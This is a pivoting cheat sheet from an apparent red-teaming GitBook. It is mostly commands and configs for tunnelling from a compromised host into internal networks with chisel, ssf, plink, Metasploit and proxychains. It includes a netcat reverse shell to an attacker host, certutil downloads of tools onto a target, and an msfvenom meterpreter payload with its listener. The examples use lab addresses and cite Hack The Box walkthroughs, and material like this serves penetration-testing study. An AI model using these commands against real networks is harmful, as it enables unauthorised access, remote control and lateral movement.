Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
    • Doppelganger: Cloning and Dumping LSASS (Win11)
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Nmap pivoting
  • Pivoting with weevely via webshell
  • ngrok
  • Chisel
  • ssf
  • Plink.exe
  • Metasploit tunnel
  • Auto-route MSF (double pivot)
  • Double pivoting with proxychains
  • Ligolo-ng : Tunneling like a VPN
  • Pivoting references

Was this helpful?

  1. Cheat Sheet
  2. Stuff

Pivoting

PreviousFile TransferNextActive Directory 101

Last updated 8 months ago

Was this helpful?

Nmap pivoting

Use nmap standalone binary to scan other machines on the internal network. This is the best option to scan large networks without proxy all the traffic.

Pivoting with weevely via webshell

https://github.com/epinna/weevely3

:net_proxy - Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_scan  - TCP Port scan.

ngrok

vim ~/.ngrok2/ngrok.yml

tunnels:
        http1:
                addr: 8080
                proto: http

        tcp1:
                addr: 8181
                proto: tcp

        tcp2:
                addr: 8282
                proto: tcp

./ngrok start -all

Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

--pivoting remote service--
Kali box:   10.10.14.10 
Target box: 10.10.10.9 

kali:> ./chisel server -p 8000 --host 0.0.0.0 --reverse -v 
target box:> chisel_windows.exe client 10.10.14.10:8000 R:8081:10.10.10.9:81
kali:> curl localhost:8001

target box:> chisel_windows.exe client 10.10.14.10:8000 R:8445:10.10.10.9:445
kali :> nmap -sT -Pn 127.0.0.1 -p 8445 -v

--socks tunnel--
kali:> ./chisel server -p 8000 --reverse -v
target:> chisel_windows.exe client 10.10.14.10:8000 R:8001:127.0.0.1:9001
target:> chisel_windows.exe server -p 9001 --socks5
kali:> ./chisel client localhost:8001 socks

kali:> vim /etc/proxychains
socks5 127.0.0.1 1080

proxychains curl 10.10.10.9:x

ssf

Secure Socket Funneling (SSF) is a network tool and toolkit. It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS tunnel to a remote computer.

1. We need to upload the certifications into the target machine 2. Download the windows and Linux binaries from GitHub repository 3. Execute the ssfd (server) on the Linux side

./ssfd
[2019-09-03T10:34:41-04:00] [info] [config] [tls] CA cert path: <file: ./certs/trusted/ca.crt>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] cert path: <file: ./certs/certificate.crt>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] key path: <file: ./certs/private.key>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] key password: <>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] dh path: <file: ./certs/dh4096.pem>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] cipher suite: <DHE-RSA-AES256-GCM-SHA384>
[2019-09-03T10:34:41-04:00] [info] [config] [http proxy] <None>
[2019-09-03T10:34:41-04:00] [info] [config] [socks proxy] <None>
[2019-09-03T10:34:41-04:00] [info] [config] [circuit] <None>
[2019-09-03T10:34:41-04:00] [info] [ssfd] listening on <*:8011>
[2019-09-03T10:34:41-04:00] [info] [ssfd] running (Ctrl + C to stop)

4. Upload the certificates and ssf client into the target machine (windows)

certutil.exe -urlcache -split -f http://10.10.14.10/ssf_windows/ssf.exe ssf.exe
certutil.exe -urlcache -split -f http://10.10.14.10/ssf_windows/certs.zip certs.zip

Download 7zip command line
https://www.7-zip.org/a/7za920.zip

:> 7za E certs.zip

./ssf -g -F 1080 -Y 1111 -L 172.19.0.4:2222:10.10.14.3:2222 -L 172.19.0.4:3333:10.10.14.3:3333 10.10.14.3

On target host I will start the client, telling it to connect back to my box. I’ll use the following options:

-g - allow gateway ports. This allows client to bind local sockets to address besides localhost. -F 1080 - This runs a socks proxy on the server on port 1080. -Y 1111 - This opens local port 1111 as a shell on the client. -L 172.19.0.4:2222:10.10.14.3:2222 and -L 172.19.0.4:3333:10.10.14.3:3333 - These will open listeners on the target machine that will forwards back to my attacker box. This will come in handy when I want to exploit further machines that can’t talk to my attacker box directly.

--socks5--
ssf.exe -g -F 1080 -Y 1111 10.10.14.10

kali:> vim /etc/proxychains
socks5 127.0.0.1 1080

proxychains curl 10.10.10.9:81

Reference: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

Plink.exe

:> service ssh restart
:> netstat -antp | grep 22
:> adduser pp
:> userdel –r pp (to delete the created user)

nc.exe 10.10.14.10 4444 -e cmd.exe
plink.exe -ssh pp@10.10.14.10 -R 3306:localhost:3306
plink.exe -l pp -R 445:127.0.0.1:445 10.10.14.10

--smb--
plink -R 445:localhost:445 -pw pp pp@10.10.14.10 -N
plink.exe -R 8081:localhost:445 pp@10.10.14.10 -N -v

Ensure that kali linux is allowing port-forwarding:

vim /etc/ssh/sshd_config
GatewayPorts yes

Reference: https://hackso.me/bighead-htb-walkthrough/

Metasploit tunnel

Create the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=443 -f exe -o meterpreter.exe

Start the listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.16
set LPORT 443
exploit

--or--
handler -H 0.0.0.0 -P 443 -p windows/meterpreter/reverse_tcp

Type "background" to put the section in the 2nd plane

Add the route and session (1)

route add 10.10.10.9 255.255.255.0 1

Verify the route: route print

Create the socks4 proxy

use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
run

Configure proxychains

vim /etc/proxychains.conf
Edit the ProxyList at the bottom of the file:
socks4   127.0.0.1   1080

Run your commands

proxychains nmap -Pn -sT -p445,3389 10.0.0.10
proxychains rdesktop 10.0.0.10
proxychains firefox 10.0.0.10

Auto-route MSF (double pivot)

Imagine you have "www" access to a web-server located at the DMZ. With this technique, you can pivot through the infrastructure easily via Internet without exposing ports in your home-router.

:> ifconfig
:> run autoroute -s ip/mask
CTRL+Z

:> search socks4
:> run (1080)
search exploit
run

Double pivoting with proxychains

First, create a dynamic port forwarding through the first network:
ssh -f -N -D 9050 root@10.1.2.1

Edit /etc/proxychains.conf and add as default gateway:
socks4 127.0.0.1 9050

Use the proxy to create a second dynamic port forward to the second network:
proxychains ssh -f -N -D 10050 root@10.1.2.1 -p 22

Edit again /etc/proxychains.conf and add as default gateway:
socks4 127.0.0.1 10050

You can now use proxychains to pivot to the target network:
proxychains nmap -sTV -n -PN 10.1.2.1 -254

Ligolo-ng : Tunneling like a VPN

Pivoting references

https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap
GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub
Port Forwarding - CheatSheet – IronHackers / Ghostpp7ironHackers
How to Pivot the Network (Port-Forwarding/Redirection) - A Hands-On LookCybrary
BigHead: Hack The Box Walkthroughhacksome
GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub
Explore Hidden Networks With Double PivotingPentest Blog
OSCP Journey &#8211; Third WeekPerseverance
Logo
Logo
Logo
Logo
Logo
Logo
Logo